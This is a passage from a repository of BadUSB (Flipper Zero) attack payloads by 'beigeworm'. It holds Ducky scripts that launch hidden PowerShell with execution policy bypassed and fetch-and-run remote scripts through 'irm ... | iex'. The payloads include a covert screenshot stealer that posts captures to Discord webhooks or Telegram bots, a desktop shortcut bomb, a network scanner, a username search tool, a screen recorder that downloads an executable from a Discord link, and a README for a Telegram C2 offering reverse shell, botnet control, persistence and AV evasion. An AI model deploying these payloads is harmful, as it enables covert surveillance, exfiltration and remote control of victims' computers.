$dashline.Text = "-"
$dashline.ForeColor = "#bcbcbc"
$dashline.AutoSize = $true
$dashline.Width = 25
$dashline.Height = 10
$dashline.Location = New-Object System.Drawing.Point(220, 35)
$dashline.Font = 'Microsoft Sans Serif,9,style=Bold'
$startip = New-Object System.Windows.Forms.TextBox
$startip.Location = New-Object System.Drawing.Point(170, 35)
$startip.BackColor = "#eeeeee"
$startip.Width = 50
$startip.Height = 40
$startip.Text = "1"
$startip.Multiline = $false
$startip.Font = 'Microsoft Sans Serif,8,style=Bold'
$startip.add_MouseHover($showhelp)
$startip.name="startrange"
$endip = New-Object System.Windows.Forms.TextBox
$endip.Location = New-Object System.Drawing.Point(230, 35)
$endip.BackColor = "#eeeeee"
$endip.Width = 50
$endip.Height = 40
$endip.Text = "254"
$endip.Multiline = $false
$endip.Font = 'Microsoft Sans Serif,8,style=Bold'
$endip.add_MouseHover($showhelp)
$endip.name="endrange"
#==================================================== Define GUI Elements ==========================================================
$MainWindow.controls.AddRange(@($TextBoxInput, $startip, $endip, $StartScan, $sshboxtext, $sshbox, $manufacturerboxtext, $manufacturerbox, $hostnameboxtext, $hostnamebox, $OutputBox, $TextboxInputHeader, $dashline))
#==================================================== Click Functions ==========================================================
$StartScan.Add_Click({
Function Add-OutputBoxLine{
Param ($outfeed)
$OutputBox.AppendText("`r`n$outfeed")
$OutputBox.Refresh()
$OutputBox.ScrollToCaret()
}
Add-OutputBoxLine -Outfeed "Starting scan..."
$FileOut = "$env:temp\Computers.csv"
$Subnet = $TextBoxInput.Text
$a=[int]$startip.text
$b=[int]$endip.text
$a..$b|ForEach-Object{
Start-Process -WindowStyle Hidden ping.exe -Argumentlist "-n 1 -l 0 -f -i 2 -w 100 -4 $SubNet$_"
}
$Computers = (arp.exe -a | Select-String "$SubNet.*dynam") -replace ' +',','|
ConvertFrom-Csv -Header Computername,IPv4,MAC,x,Vendor|
Select IPv4,MAC
$Computers | Export-Csv $FileOut -NotypeInformation
if($sshbox.Checked){
$data = Import-Csv "$env:temp\Computers.csv"
$data | Add-Member -MemberType NoteProperty -Name "ssh" -Value ""
$data | ForEach-Object {
$ip = $_.'IPv4'
try {
$tcpClient = New-Object System.Net.Sockets.TcpClient
$timeout = 2 * 1000 # 2 seconds timeout
$asyncResult = $tcpClient.BeginConnect($ip, 22, $null, $null)
$wait = $asyncResult.AsyncWaitHandle.WaitOne($timeout, $false)
if ($wait) {
$tcpClient.EndConnect($asyncResult)
$ssh = "Yes"
} else {
$ssh = "No"
}
$tcpClient.Close()
} catch {
$ssh = "Closed"
}
$_ | Add-Member -MemberType NoteProperty -Name "ssh" -Value $ssh -force
}
$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
}
if($manufacturerbox.Checked){
$data = Import-Csv "$env:temp\Computers.csv"
$data | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value ""
$data | ForEach-Object {
$mac = $_.'MAC'
$apiUrl = "https://api.macvendors.com/" + $mac
$manufacturer = (Invoke-WebRequest -Uri $apiUrl).Content
start-sleep 1
$_ | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value $manufacturer -force
}
$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
}
if($hostnamebox.Checked){
$data = Import-Csv "$env:temp\Computers.csv"
$data | Add-Member -MemberType NoteProperty -Name "Hostname" -Value ""
$data | ForEach-Object {
try{
$ip = $_.'IPv4'
$hostname = ([System.Net.Dns]::GetHostEntry($ip)).HostName
$_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value $hostname -force
} catch{
$_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "Error: $($_.Exception.Message)"
}
}
$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
}
$textfile = Get-Content "$env:temp\Computers.csv" -Raw
Add-OutputBoxLine -Outfeed "$textfile"
})
#===================================================== Initialize Script ===================================================
$MainWindow.ShowDialog() | Out-Null
exit

13
Record-Screen-GUI/README.md Normal file
View File

@@ -0,0 +1,13 @@
<h2 align="center"> Screen Recorder GUI </h2>
SYNOPSIS
A customizable gui for screen recording with ffmpeg.exe
USAGE
1. Run script.
2. in GUI click 'Get ffmpeg.exe'
3. input desired variables and click start
4. Timestamped output file will be in the same folder as the script.

16
Record-Screen-GUI/Record-Screen-GUI.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Screen Recorder GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI window for recording the screen to .mkv file.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex
ENTER

162
Record-Screen-GUI/main.ps1 Normal file
View File

@@ -0,0 +1,162 @@
$Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $Import -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
Add-Type -AssemblyName System.Windows.Forms
$form = New-Object Windows.Forms.Form
$form.Text = " BeigeTools | Screen Recorder "
$form.Font = 'Microsoft Sans Serif,12,style=Bold'
$form.Size = New-Object Drawing.Size(350, 200)
$form.StartPosition = 'Manual'
$form.BackColor = [System.Drawing.Color]::Black
$form.ForeColor = [System.Drawing.Color]::White
$form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog
$Text = New-Object Windows.Forms.Label
$Text.Text = "Framerate"
$Text.AutoSize = $true
$Text.Font = 'Microsoft Sans Serif,10'
$Text.Location = New-Object System.Drawing.Point(15, 20)
$fps = New-Object Windows.Forms.Label
$fps.Text = "fps"
$fps.AutoSize = $true
$fps.Font = 'Microsoft Sans Serif,10'
$fps.Location = New-Object System.Drawing.Point(60, 40)
$frBox = New-Object System.Windows.Forms.TextBox
$frBox.Location = New-Object System.Drawing.Point(18, 40)
$frBox.BackColor = "#eeeeee"
$frBox.Width = 40
$frBox.Text = "25"
$frBox.Multiline = $false
$frBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$Text2 = New-Object Windows.Forms.Label
$Text2.Text = "Record Time"
$Text2.Font = 'Microsoft Sans Serif,10'
$Text2.AutoSize = $true
$Text2.Location = New-Object System.Drawing.Point(120, 20)
$sec = New-Object Windows.Forms.Label
$sec.Text = "s"
$sec.AutoSize = $true
$sec.Font = 'Microsoft Sans Serif,10'
$sec.Location = New-Object System.Drawing.Point(165, 40)
$tBox = New-Object System.Windows.Forms.TextBox
$tBox.Location = New-Object System.Drawing.Point(123, 40)
$tBox.BackColor = "#eeeeee"
$tBox.Width = 40
$tBox.Text = "30"
$tBox.Multiline = $false
$tBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$Text3 = New-Object Windows.Forms.Label
$Text3.Text = "Offset X"
$Text3.Font = 'Microsoft Sans Serif,10'
$Text3.AutoSize = $true
$Text3.Location = New-Object System.Drawing.Point(15, 70)
$ofx = New-Object Windows.Forms.Label
$ofx.Text = "px"
$ofx.AutoSize = $true
$ofx.Font = 'Microsoft Sans Serif,10'
$ofx.Location = New-Object System.Drawing.Point(60, 90)
$oxBox = New-Object System.Windows.Forms.TextBox
$oxBox.Location = New-Object System.Drawing.Point(18, 90)
$oxBox.BackColor = "#eeeeee"
$oxBox.Width = 40
$oxBox.Text = "0"
$oxBox.Multiline = $false
$oxBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$Text4 = New-Object Windows.Forms.Label
$Text4.Text = "Offset Y"
$Text4.Font = 'Microsoft Sans Serif,10'
$Text4.AutoSize = $true
$Text4.Location = New-Object System.Drawing.Point(120, 70)
$ofy = New-Object Windows.Forms.Label
$ofy.Text = "px"
$ofy.AutoSize = $true
$ofy.Font = 'Microsoft Sans Serif,10'
$ofy.Location = New-Object System.Drawing.Point(165, 90)
$oyBox = New-Object System.Windows.Forms.TextBox
$oyBox.Location = New-Object System.Drawing.Point(123, 90)
$oyBox.BackColor = "#eeeeee"
$oyBox.Width = 40
$oyBox.Text = "0"
$oyBox.Multiline = $false
$oyBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$Text5 = New-Object Windows.Forms.Label
$Text5.Text = "Video Size"
$Text5.Font = 'Microsoft Sans Serif,10'
$Text5.AutoSize = $true
$Text5.Location = New-Object System.Drawing.Point(15, 120)
$vsBox = New-Object System.Windows.Forms.TextBox
$vsBox.Location = New-Object System.Drawing.Point(18, 140)
$vsBox.BackColor = "#eeeeee"
$vsBox.Width = 140
$vsBox.Text = "1920x1080"
$vsBox.Multiline = $false
$vsBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$Download = New-Object Windows.Forms.Button
$Download.Text = "Get ffmpeg.exe"
$Download.Width = 120
$Download.Height = 30
$Download.BackColor = [System.Drawing.Color]::White
$Download.ForeColor = [System.Drawing.Color]::Black
$Download.Location = New-Object System.Drawing.Point(210, 50)
$Download.Font = 'Microsoft Sans Serif,10,style=Bold'
$Check = New-Object Windows.Forms.Button
$Check.Text = "Check Files"
$Check.Width = 120
$Check.Height = 30
$Check.BackColor = [System.Drawing.Color]::White
$Check.ForeColor = [System.Drawing.Color]::Black
$Check.Location = New-Object System.Drawing.Point(210, 90)
$Check.Font = 'Microsoft Sans Serif,10,style=Bold'
$startrecord = New-Object Windows.Forms.Button
$startrecord.Text = "Start"
$startrecord.Width = 120
$startrecord.Height = 30
$startrecord.BackColor = [System.Drawing.Color]::White
$startrecord.ForeColor = [System.Drawing.Color]::Black
$startrecord.Location = New-Object System.Drawing.Point(210, 130)
$startrecord.Font = 'Microsoft Sans Serif,10,style=Bold'
$form.Controls.AddRange(@($Text,$fps,$frBox,$Text2,$sec,$tbox,$Text3,$ofx,$oxBox,$Text4,$ofy,$oyBox,$Text5,$vsBox,$Download,$Check,$startrecord))
$Download.Add_Click{
$Path = "$env:Temp\ffmpeg.exe"
If (!(Test-Path $Path)){
$url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe"
iwr -Uri $url -OutFile $Path
}
}
$Check.Add_Click{
$Path = "$env:Temp\ffmpeg.exe"
If (!(Test-Path $Path)){msg.exe * 'Not Installed'}
else {msg.exe * 'Installed'}
}
$startrecord.Add_Click{
$timestamp = Get-Date -Format "yyyyMMdd-HHmmss"
$mkvPath = "Clip_$timestamp.mkv"
if ($t.Length -eq 0){$t = 10}
if ($fr.Length -eq 0){$fr = 25}
if ($ox.Length -eq 0){$ox = 0}
if ($oy.Length -eq 0){$oy = 0}
if ($vs.Length -eq 0){$vs = "1920x1080"}
.$env:Temp\ffmpeg.exe -f gdigrab -framerate $fr -t $t -offset_x $ox -offset_y $oy -video_size $vs -show_region 1 -i desktop $mkvPath
}
$form.ShowDialog()

10
Screen-to-Discord/README.md Normal file
View File

@@ -0,0 +1,10 @@
<h2 align="center"> Screenshot to Discord </h2>
SYNOPSIS
Takes a screenshot of the desktop and posts to a discord webhook.
SETUP
1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

20
Screen-to-Discord/Screenshot-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Screenshot to discord webhook
REM Author: @beigeworm
REM Description: This script takes a screenshot of the desktop and posts to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex
ENTER

24
Screen-to-Discord/main.ps1 Normal file
View File

@@ -0,0 +1,24 @@
$hookurl = "$dc"
$seconds = 30 # Screenshot interval
$a = 1 # Sceenshot amount
While ($a -gt 0){
$Filett = "$env:temp\SC.png"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png)
Start-Sleep 1
curl.exe -F "file1=@$filett" $hookurl
Start-Sleep 1
Remove-Item -Path $filett
Start-Sleep $seconds
$a--
}

10
Screen-to-Telegram/README.md Normal file
View File

@@ -0,0 +1,10 @@
<h2 align="center"> Screenshot to Telegram </h2>
SYNOPSIS
Takes a screenshot of the desktop and posts to a Telegram bot chat.
SETUP
1. replace TELEGRAM_TOKEN_HERE with your Telegram token.

20
Screen-to-Telegram/Screenshot-to-Telegram.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Screenshot to Telegram Bot Chat
REM Author: @beigeworm
REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat.
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN_HERE with your Telegram Token.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex
ENTER

31
Screen-to-Telegram/main.ps1 Normal file
View File

@@ -0,0 +1,31 @@
$seconds = 30 # Screenshot interval
$a = 1 # Sceenshot amount
$Token = "$tg"
$URL='https://api.telegram.org/bot{0}' -f $Token
while($chatID.length -eq 0){
$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
Sleep 10
}
While ($a -gt 0){
Add-Type -AssemblyName System.Windows.Forms
$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size)
$filePath = "$env:temp\sc.png"
$bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png)
$graphics.Dispose()
$bitmap.Dispose()
curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null
Remove-Item -Path $filePath
Start-Sleep $seconds
$a--
}

16
Shortcut-Spam/Desktop-Shortcut-Spam.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Desktop Shortcut Spammer.
REM Author: @beigeworm
REM Description: This script creates 100 shortcuts on the users Desktop.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Shortcut-Spam/main.ps1 | iex
ENTER

12
Shortcut-Spam/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Simple Shortcut Bomb </h2>
SYNOPSIS
This script will create 200 shortcuts on the desktop very quickly.
USAGE
1. Change '100' to the number of shortcuts you want created
2. Run the script.

18
Shortcut-Spam/main.ps1 Normal file
View File

@@ -0,0 +1,18 @@
$n = 100
$i = 0
while($i -lt $n)
{
$num = Get-Random
$Location = "C:\Windows\System32\rundll32.exe"
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk")
$Shortcut.TargetPath = $Location
$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll"
$Shortcut.IconLocation = "hotplug.dll,0"
$Shortcut.Description ="Device Removal"
$Shortcut.WorkingDirectory ="C:\Windows\System32"
$Shortcut.Save()
Start-Sleep -Milliseconds 10
$i++
}

12
Social-Search-GUI/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Social Search GUI </h2>
SYNOPSIS
This script presents a GUI for searching popular websites with a single username..
USAGE
1. Run script with powershell
2. Input your desired username
3. Press "Start Search"

16
Social-Search-GUI/Username-Search-GUI.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Username Search GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for searching social media and other sites with a specified Username.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Social-Search-GUI/main.ps1 | iex
ENTER

299
Social-Search-GUI/main.ps1 Normal file
View File

@@ -0,0 +1,299 @@
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName Microsoft.VisualBasic
[System.Windows.Forms.Application]::EnableVisualStyles()
$MainWindow = New-Object System.Windows.Forms.Form
$MainWindow.ClientSize = '690,700'
$MainWindow.Text = "| Beigetools | Social Search |"
$MainWindow.BackColor = "#242424"
$MainWindow.Opacity = 1
$MainWindow.TopMost = $true
$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\charmap.exe")
$TextInput = New-Object System.Windows.Forms.TextBox
$TextInput.Location = New-Object System.Drawing.Point(20, 40)
$TextInput.BackColor = "#eeeeee"
$TextInput.Width = 370
$TextInput.Height = 40
$TextInput.Font = 'Microsoft Sans Serif,12,style=Bold'
$TextInput.add_MouseHover($showhelp)
$TextInput.name="input"
$TextInputHeader = New-Object System.Windows.Forms.Label
$TextInputHeader.Text = "Username"
$TextInputHeader.ForeColor = "#bcbcbc"
$TextInputHeader.AutoSize = $true
$TextInputHeader.Width = 25
$TextInputHeader.Height = 10
$TextInputHeader.Location = New-Object System.Drawing.Point(20, 20)
$TextInputHeader.Font = 'Microsoft Sans Serif,10,style=Bold'
$OutputBoxHeader = New-Object System.Windows.Forms.Label
$OutputBoxHeader.Text = "Results"
$OutputBoxHeader.ForeColor = "#bcbcbc"
$OutputBoxHeader.AutoSize = $true
$OutputBoxHeader.Width = 25
$OutputBoxHeader.Height = 10
$OutputBoxHeader.Location = New-Object System.Drawing.Point(20, 90)
$OutputBoxHeader.Font = 'Microsoft Sans Serif,10,style=Bold'
$OutputBox = New-Object System.Windows.Forms.TextBox
$OutputBox.Multiline = $True;
$OutputBox.Location = New-Object System.Drawing.Size(20,110)
$OutputBox.Width = 650
$OutputBox.Height = 570
$OutputBox.Scrollbars = "Vertical"
$OutputBox.Font = 'Microsoft Sans Serif,12,style=Bold'
$DecodeBT = New-Object System.Windows.Forms.Button
$DecodeBT.Text = "Start Search"
$DecodeBT.Width = 150
$DecodeBT.Height = 35
$DecodeBT.Location = New-Object System.Drawing.Point(520, 30)
$DecodeBT.Font = 'Microsoft Sans Serif,10,style=Bold'
$DecodeBT.BackColor = "#eeeeee"
$DecodeBT.add_MouseHover($showhelp)
$DecodeBT.name="decode"
$MainWindow.controls.AddRange(@($TextInput,$DecodeBT,$OutputBox,$TextInputHeader,$OutputBoxHeader))
$DecodeBT.Add_Click({
Function Add-OutputBoxLine{
Param ($outfeed)
$OutputBox.AppendText("`r`n$outfeed")
$OutputBox.Refresh()
$OutputBox.ScrollToCaret()
}
$myArray = @(
"https://twitter.com/$userhandle",
"https://www.instagram.com/$userhandle/",
"https://ws2.kik.com/user/$userhandle/",
"https://medium.com/@$userhandle",
"https://pastebin.com/u/$userhandle/",
"https://www.patreon.com/$userhandle/",
"https://photobucket.com/user/$userhandle/library",
"https://www.pinterest.com/$userhandle/",
"https://myspace.com/$userhandle/",
"https://www.reddit.com/user/$userhandle/"
"https://2Dimensions.com/a/$userhandle"
"https://www.7cups.com/@$userhandle"
"https://www.9gag.com/u/$userhandle"
"https://about.me/$userhandle"
"https://independent.academia.edu/$userhandle"
"https://www.alik.cz/u/$userhandle"
"https://www.alltrails.com/members/$userhandle"
"https://www.anobii.com/$userhandle/profile"
"https://discussions.apple.com/profile/$userhandle"
"https://archive.org/details/@$userhandle"
"https://asciinema.org/~$userhandle"
"https://ask.fm/$userhandle"
"https://discuss.atom.io/u/$userhandle/summary"
"https://audiojungle.net/user/$userhandle"
"https://www.avizo.cz/$userhandle/"
"https://blip.fm/$userhandle"
"https://$userhandle.booth.pm/"
"https://www.behance.net/$userhandle"
"https://binarysearch.io/@/$userhandle"
"https://bitbucket.org/$userhandle/"
"https://$userhandle.blogspot.com"
"https://bodyspace.bodybuilding.com/$userhandle"
"https://www.bookcrossing.com/mybookshelf/$userhandle/"
"https://buzzfeed.com/$userhandle"
"https://www.cnet.com/profiles/$userhandle/"
"https://$userhandle.carbonmade.com"
"https://career.habr.com/$userhandle"
"https://beta.cent.co/@$userhandle"
"https://www.championat.com/user/$userhandle"
"https://www.chess.com/member/$userhandle"
"https://www.cloob.com/name/$userhandle"
"https://community.cloudflare.com/u/$userhandle"
"https://www.codecademy.com/profiles/$userhandle"
"https://www.codechef.com/users/$userhandle"
"https://www.codewars.com/users/$userhandle"
"https://www.colourlovers.com/lover/$userhandle"
"https://www.coroflot.com/$userhandle"
"https://www.countable.us/$userhandle"
"https://www.cracked.com/members/$userhandle/"
"https://$userhandle.crevado.com"
"https://dev.to/$userhandleali"
"https://www.dailymotion.com/$userhandle"
"https://www.designspiration.net/$userhandle/"
"https://$userhandle.deviantart.com"
"https://www.discogs.com/user/$userhandle"
"https://discuss.elastic.co/u/$userhandle"
"https://disqus.com/$userhandle"
"https://dribbble.com/$userhandle"
"https://www.duolingo.com/profile/$userhandle"
"https://ello.co/$userhandle"
"https://euw.op.gg/summoner/userName=$userhandle"
"https://www.eyeem.com/u/$userhandle"
"https://f3.cool/$userhandle/"
"https://www.facebook.com/$userhandle"
"https://facenama.com/$userhandle"
"https://www.flickr.com/people/$userhandle"
"https://flipboard.com/@$userhandle"
"https://fortnitetracker.com/profile/all/$userhandle"
"https://freelance.habr.com/freelancers/$userhandle"
"https://www.freelancer.com/api/users/0.1/users?usernames%5B%5D=$userhandle&compact=true"
"https://freesound.org/people/$userhandle/"
"https://www.gamespot.com/profile/$userhandle/"
"https://giphy.com/$userhandle"
"https://www.github.com/$userhandle"
"https://gitlab.com/$userhandle"
"https://gitee.com/$userhandle"
"http://en.gravatar.com/$userhandle"
"https://www.gumroad.com/$userhandle"
"https://gurushots.com/$userhandle/photos"
"https://hackaday.io/$userhandle"
"https://news.ycombinator.com/user?id=$userhandle"
"https://hackerone.com/$userhandle"
"https://hackerrank.com/$userhandle"
"https://www.house-mixes.com/profile/$userhandle"
"https://icq.im/$userhandle"
"https://www.ifttt.com/p/$userhandle"
"https://www.instructables.com/member/$userhandle"
"https://$userhandle.itch.io/"
"https://$userhandle.jimdosite.com"
"https://forums.kali.org/member.php?username=$userhandle"
"https://keybase.io/$userhandle"
"https://kik.me/$userhandle"
"https://www.linux.org.ru/people/$userhandle/profile"
"https://launchpad.net/~$userhandle"
"https://leetcode.com/$userhandle"
"https://letterboxd.com/$userhandle"
"https://lichess.org/@/$userhandle"
"https://$userhandle.livejournal.com"
"https://www.liveleak.com/c/$userhandle"
"https://lolchess.gg/profile/na/$userhandle"
"https://www.memrise.com/user/$userhandle/"
"https://www.mixcloud.com/$userhandle/"
"https://www.munzee.com/m/$userhandle"
"https://myanimelist.net/profile/$userhandle"
"https://www.myminifactory.com/users/$userhandle"
"https://myspace.com/$userhandle"
"https://www.native-instruments.com/forum/members?username=$userhandle"
"https://namemc.com/profile/$userhandle"
"https://blog.naver.com/$userhandle"
"https://$userhandle.newgrounds.com"
"https://notabug.org/$userhandle"
"https://www.openstreetmap.org/user/$userhandle"
"https://opensource.com/users/$userhandle"
"https://forums.pcgamer.com/members/?username=$userhandle"
"https://packagist.org/packages/$userhandle/"
"https://pastebin.com/u/$userhandle"
"https://www.patreon.com/$userhandle"
"https://www.periscope.tv/$userhandle/"
"https://www.pinkbike.com/u/$userhandle/"
"https://www.pinterest.com/$userhandle/"
"https://plug.dj/@/$userhandle"
"https://polarsteps.com/$userhandle"
"https://www.producthunt.com/@$userhandle"
"http://promodj.com/$userhandle"
"https://pypi.org/user/$userhandle"
"https://quizlet.com/$userhandle"
"https://raidforums.com/User-$userhandle"
"https://www.reddit.com/user/$userhandle"
"https://repl.it/@$userhandle"
"https://www.reverbnation.com/$userhandle"
"https://rubygems.org/profiles/$userhandle"
"https://www.scribd.com/$userhandle"
"https://$userhandle.slack.com"
"https://slashdot.org/~$userhandle"
"https://slideshare.net/$userhandle"
"https://soundcloud.com/$userhandle"
"https://sourceforge.net/u/$userhandle"
"https://www.sparkpeople.com/mypage.asp?id=$userhandle"
"https://speedrun.com/user/$userhandle"
"https://www.sporcle.com/user/$userhandle/people"
"https://open.spotify.com/user/$userhandle"
"https://robertsspaceindustries.com/citizens/$userhandle"
"https://steamcommunity.com/id/$userhandle"
"https://steamcommunity.com/groups/$userhandle"
"https://steamid.uk/profile/$userhandle"
"https://www.strava.com/athletes/$userhandle"
"https://forum.sublimetext.com/u/$userhandle"
"https://ch.tetr.io/u/$userhandle"
"https://tellonym.me/$userhandle"
"https://tiktok.com/@$userhandle"
"https://www.gotinder.com/@$userhandle"
"http://en.tm-ladder.com/$userhandle_rech.php"
"https://www.tradingview.com/u/$userhandle/"
"https://trello.com/$userhandle"
"https://tripadvisor.com/members/$userhandle"
"https://tryhackme.com/p/$userhandle"
"https://www.twitch.tv/$userhandle"
"https://ultimate-guitar.com/u/$userhandle"
"https://unsplash.com/@$userhandle"
"https://vsco.co/$userhandle"
"https://forum.velomania.ru/member.php?username=$userhandle"
"https://vero.co/$userhandle"
"https://vimeo.com/$userhandle"
"https://virgool.io/@$userhandle"
"https://www.virustotal.com/ui/users/$userhandle/trusted_users"
"https://www.warriorforum.com/members/$userhandle.html"
"https://weheartit.com/$userhandle"
"https://$userhandle.webnode.cz/"
"http://www.wikidot.com/user:info/$userhandle"
"https://www.wikipedia.org/wiki/User:$userhandle"
"https://community.windy.com/user/$userhandle"
"https://profiles.wordpress.org/$userhandle/"
"https://xboxgamertag.com/search/$userhandle"
"https://www.younow.com/$userhandle/"
"https://youpic.com/photographer/$userhandle/"
"https://www.youtube.com/$userhandle"
"https://www.zhihu.com/people/$userhandle"
"https://akniga.org/profile/$userhandle"
"https://allmylinks.com/$userhandle"
"https://aminoapps.com/u/$userhandle"
"http://www.authorstream.com/$userhandle/"
"https://www.couchsurfing.com/people/$userhandle"
"https://www.geocaching.com/p/default.aspx?u=$userhandle"
"https://gfycat.com/@$userhandle"
"https://www.hackster.io/$userhandle"
"https://www.interpals.net/$userhandle"
"http://www.jeuxvideo.com/profil/$userhandle?mode=infos"
"https://last.fm/user/$userhandle"
"https://forum.leasehackr.com/u/$userhandle/summary/"
"https://www.livelib.ru/reader/$userhandle"
"https://mastodon.cloud/@$userhandle"
"https://mastodon.social/@$userhandle"
"https://mastodon.technology/@$userhandle"
"https://mastodon.xyz/@$userhandle"
"https://www.mercadolivre.com.br/perfil/$userhandle"
"https://www.metacritic.com/user/$userhandle"
"https://mstdn.io/@$userhandle"
"https://www.nairaland.com/$userhandle"
"https://note.com/$userhandle"
"https://www.npmjs.com/~$userhandle"
"https://osu.ppy.sh/users/$userhandle"
"https://php.ru/forum/members/?username=$userhandle"
"https://pr0gramm.com/user/$userhandle"
"https://social.tchncs.de/@$userhandle"
"http://uid.me/$userhandle"
)
$userhandle = $TextInput.Text
Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------"
Add-OutputBoxLine -outfeed "Searching Username:$userhandle Against Known Websites List..."
Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------"
foreach ($i in $myArray) {
try{
$response = Inv`o`ke-`W`ebR`e`qu`e`st -Uri "$i" -ErrorAction Stop
$StatusCode = $Response.StatusCode
}catch{$StatusCode = $_.Exception.Response.StatusCode.value__}
if ($StatusCode -eq "200"){
Add-OutputBoxLine -outfeed "Found one: $i$userhandle"
}if ($StatusCode -eq "404"){}else {}}
})
$MainWindow.ShowDialog() | Out-Null
exit

151
Telegram-C2/README.md Normal file
View File

@@ -0,0 +1,151 @@
# Beigeworm's Telegram C2 Client
MAIN SCRIPT HERE - https://github.com/beigeworm/PoshGram-C2
**SYNOPSIS**
-------------
Using a Telegram Bot's Chat to Act as a Command and Control Server.
Telegram Bots are able to both receive AND send messages. so can you use it as a C2 Server?
-----------------------------------------------------------------------------------------------------------------------------
**INFORMATION**
---------------
This script will wait until it is called in the Telegram chat by it's host computer name (eg. DESKTOP-WG65HY). Then Click 'Enter Commands' or 'Options' to begin the session and accept commands from Telegram chat.
During a connected session, A list of Modules can be accessed by typing 'options' in chat. Or you can use the chat to act simply as a reverse shell with standard PowerShell commands.
-----------------------------------------------------------------------------------------------------------------------------
Confirmed working with no Microsoft AV detections, on a variety of Windows systems over a week or so of testing 14/08/23
*(Win 10 Laptop, Win 11 Laptop, 2 Win 11 Desktops, 2 Win10 Desktops, Win 10 VM, AtlasOS Win 10 Laptop. ReviOS Win 10 Macbook w/ Bootcamp) will add more in future...*
-----------------------------------------------------------------------------------------------------------------------------
**FEATURES**
-------------
**Session Queue** - While running, this script waits for a start phrase (the computer name) before connecting, allowing multiple computers to wait for interaction.
**Botnet Mode** - Add simultaneous sessions to control multiple computers at once. (enter computer names one after the other into chat)
**Persistance** - Can add itself to startup folder (RemovePersistance command will undo this)
